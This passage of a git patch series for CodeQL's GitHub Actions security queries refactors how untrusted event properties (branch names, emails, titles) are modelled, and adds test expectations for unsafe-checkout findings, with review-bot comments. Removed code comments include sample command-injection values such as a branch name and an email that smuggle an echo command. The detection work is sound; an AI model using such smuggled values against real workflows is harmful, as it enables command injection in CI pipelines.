.github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| 
.github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run 
Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -242,6 +294,12 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | 
@@ -261,5 +319,7 @@ edges | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 5bf0e56e1b7..61c328b7011 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,7 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 4aba07074c8b17e9a276216911475eb27749d57c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:45:13 +0200 Subject: [PATCH 0353/1267] Bump qlpack versionsi --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 847a7b83e54..5369af75489 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.5 +version: 0.1.6 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index be2b4e428c9..a019dd6f695 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.5 +version: 0.1.6 groups: [actions, queries] suites: codeql-suites extractor: javascript 
From 5997038923a8d7b0d36c175f569974f576aad4f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:07:02 +0200 Subject: [PATCH 0354/1267] Exclude self-hosted query from CodeScanning suite --- ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index 621b7fb050d..b32fe406877 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -9,6 +9,8 @@ * @tags actions * security * external/cwe/cwe-284 + * testing + * experimental */ import codeql.actions.security.SelfHostedQuery From d11c15dc287049b8afec4c6c0d10a163d9739c04 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:07:55 +0200 Subject: [PATCH 0355/1267] Bump qlpack versionsi --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5369af75489..b2b92e45e7a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.6 +version: 0.1.7 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a019dd6f695..899f62cf9ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.6 +version: 0.1.7 groups: [actions, queries] suites: codeql-suites extractor: javascript From eeba26a647b5d8d7a2c6f316f159ecccac87711d Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:55:21 +0200 Subject: [PATCH 0356/1267] fix typos --- ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index b71b3cbba99..9f7f3fd8cee 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind path-problem diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 9faab24dbcb..980560dac9a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem 
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 574c2d7bffe..89d2e741306 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem From 4516d3df812d065888e374a1662cf9b3e6d6a8d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 16:09:49 +0200 Subject: [PATCH 0357/1267] Bump qlpack versions --- ql/lib/codeql-pack.lock.yml | 12 ++++++------ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 12 ++++++------ ql/test/codeql-pack.lock.yml | 12 ++++++------ 4 files changed, 22 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 4b8239b7f6c..21e0b8bb0e9 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b2b92e45e7a..5f3825a9157 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -4,10 +4,10 @@ warnOnImplicitThis: true name: github/actions-all version: 0.1.7 dependencies: - codeql/util: ^1.0.0 - codeql/yaml: ^1.0.0 - codeql/controlflow: ^1.0.0 - codeql/dataflow: ^1.0.0 + codeql/util: ^1.0.1 + codeql/yaml: ^1.0.1 + codeql/controlflow: ^1.0.1 + codeql/dataflow: ^1.0.1 extractor: javascript groups: javascript dataExtensions: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 4b8239b7f6c..21e0b8bb0e9 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 4b8239b7f6c..21e0b8bb0e9 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false From a99d293309942f7879d670ba8c10645e54820fb8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 16:33:45 +0200 Subject: [PATCH 0358/1267] Bump to dataflow version 1.0.1 --- .../actions/dataflow/internal/DataFlowPrivate.qll | 10 ++++++++++ ql/lib/qlpack.yml | 1 + ql/{src => lib}/semmlecode.javascript.dbscheme | 0 ql/{src => lib}/semmlecode.javascript.dbscheme.stats | 0 ql/src/qlpack.yml | 1 - 5 files changed, 11 insertions(+), 1 deletion(-) rename ql/{src => lib}/semmlecode.javascript.dbscheme (100%) rename ql/{src => lib}/semmlecode.javascript.dbscheme.stats (100%) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 17b29f57025..ec889f19205 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -84,6 +84,11 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a best-effort total ordering. */ int totalorder() { none() } + + /** Gets the location of this call. */ + Location getLocation() { + result = this.getLocation() + } } /** @@ -113,6 +118,11 @@ class DataFlowCallable instanceof Cfg::CfgScope { /** Gets a best-effort total ordering. */ int totalorder() { none() } + + /** Gets the location of this callable. */ + Location getLocation() { + result = this.getLocation() + } } newtype TReturnKind = TNormalReturn() diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5f3825a9157..3c37e64b856 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -9,6 +9,7 @@ dependencies: codeql/controlflow: ^1.0.1 codeql/dataflow: ^1.0.1 extractor: javascript +dbscheme: semmlecode.javascript.dbscheme groups: javascript dataExtensions: - ext/manual/*.model.yml diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme similarity index 100% rename from ql/src/semmlecode.javascript.dbscheme rename to ql/lib/semmlecode.javascript.dbscheme 
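Review bot: In both added `getLocation()` members (in `DataFlowCall` in the first hunk and `DataFlowCallable` in the second) the body `result = this.getLocation()` calls the member being defined. Both classes are declared with `instanceof` rather than `extends`, so they do not inherit `getLocation` from `Cfg::Node` or `Cfg::CfgScope`, and `this.getLocation()` most likely resolves to the new predicate itself. That would make it recursive with no base case and therefore empty. The usual form for an `instanceof` class is `Location getLocation() { result = super.getLocation() }`. Both class bodies start outside the hunks, so confirm against how the neighbouring members delegate.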
diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats similarity index 100% rename from ql/src/semmlecode.javascript.dbscheme.stats rename to ql/lib/semmlecode.javascript.dbscheme.stats diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 899f62cf9ba..f7464c78452 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -5,7 +5,6 @@ version: 0.1.7 groups: [actions, queries] suites: codeql-suites extractor: javascript -dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: github/actions-all: ${workspace} From d998373162cd1660881a14b3feac29da1efac113 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:08:40 +0200 Subject: [PATCH 0359/1267] Move event sources to config files --- ql/lib/codeql/actions/config/Config.qll | 10 ++ .../actions/config/ConfigExtensions.qll | 5 + .../codeql/actions/dataflow/FlowSources.qll | 154 +----------------- .../ext/config/untrusted_event_properties.yml | 83 ++++++++++ 4 files changed, 103 insertions(+), 149 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_event_properties.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index d6a85c426c6..dd63fda93d1 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -72,3 +72,13 @@ predicate poisonableLocalScriptsDataModel(string regexp, int group) { predicate poisonableActionsDataModel(string action) { Extensions::poisonableActionsDataModel(action) } + +/** + * MaD models for for event properties that can be user-controlled. + * Fields: + * - property: event property + * - kind: property kind + */ +predicate untrustedEventPropertiesDataModel(string property, string kind) { + Extensions::untrustedEventPropertiesDataModel(property, kind) +} 
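Review bot: The doc comment on `untrustedEventPropertiesDataModel` has a doubled word (`for for`) and describes `kind` only as "property kind", although FlowSources.qll later in this commit treats the value `json` specially. The first column is also used as a regular expression rather than a literal property name, which the comment should say: `* - property: regular expression matching the event property`. For the second column, something like `* - kind: property kind (e.g. title, url, text, branch, label, email); json appears to mark whole-object contexts` would make the contract readable without opening the YAML.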
diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 3ca4b6a7559..26e77ce7235 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -39,3 +39,8 @@ extensible predicate poisonableLocalScriptsDataModel(string regexp, int group); */ extensible predicate poisonableActionsDataModel(string action); +/** + * Holds for event properties that can be user-controlled. + */ +extensible predicate untrustedEventPropertiesDataModel(string property, string kind); + diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b09664359ab..79934ca586b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -20,136 +20,6 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -private string titleEvent() { - result = - [ - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", - ] -} - -private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } - -private string textEvent() { - result = - [ - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] -} - -private string branchEvent() { - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. 
- // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . - // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - result = - [ - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] -} - -private string labelEvent() { - // - They cannot contain a escaping \ - result = ["github\\.event\\.pull_request\\.head\\.label",] -} - -private string emailEvent() { - // `echo${IFS}hello`@domain.com - result = - [ - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] -} - -private string usernameEvent() { - // All characters must be either a hyphen (-) or alphanumeric - result = - [ - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] -} - -private string pathEvent() { - result = - [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] -} - -private string 
jsonEvent() { - result = - [ - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - "github\\.event\\.workflow_run\\.pull_requests", - ] - or - result = titleEvent() - or - result = urlEvent() - or - result = textEvent() - or - result = branchEvent() - or - result = labelEvent() - or - result = emailEvent() - or - result = usernameEvent() - or - result = pathEvent() -} - class GitHubCtxSource extends RemoteFlowSource { string flag; @@ -184,23 +54,8 @@ class GitHubEventCtxSource extends RemoteFlowSource { or exists(e.getEnclosingCompositeAction()) ) and - ( - regexp = titleEvent() and flag = "title" - or - regexp = urlEvent() and flag = "url" - or - regexp = textEvent() and flag = "text" - or - regexp = branchEvent() and flag = "branch" - or - regexp = labelEvent() and flag = "label" - or - regexp = emailEvent() and flag = "email" - or - regexp = usernameEvent() and flag = "username" - or - regexp = pathEvent() and flag = "filename" - ) and + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } 
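Review bot: The flag reported by `GitHubEventCtxSource` now comes straight from the `kind` column, so its values are no longer fixed in this predicate; the removed code used `title`, `url`, `text`, `branch`, `label`, `email`, `username` and `filename`. A row whose kind is spelled differently (say `path` instead of `filename`) would silently change what consumers of the flag see. The path rows of the YAML are not visible in this part of the patch, so that is worth checking. The `not flag = "json"` exclusion also deserves a comment, e.g. `// kind "json" rows are matched by GitHubEventJsonSource`. The class body starts outside the hunk.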
@@ -212,9 +67,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { string flag; GitHubEventJsonSource() { - exists(Expression e, string context | + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` @@ -223,7 +79,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or // github.event is taintes for all triggers contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml new file mode 100644 index 00000000000..739544455da --- /dev/null +++ b/ql/lib/ext/config/untrusted_event_properties.yml 
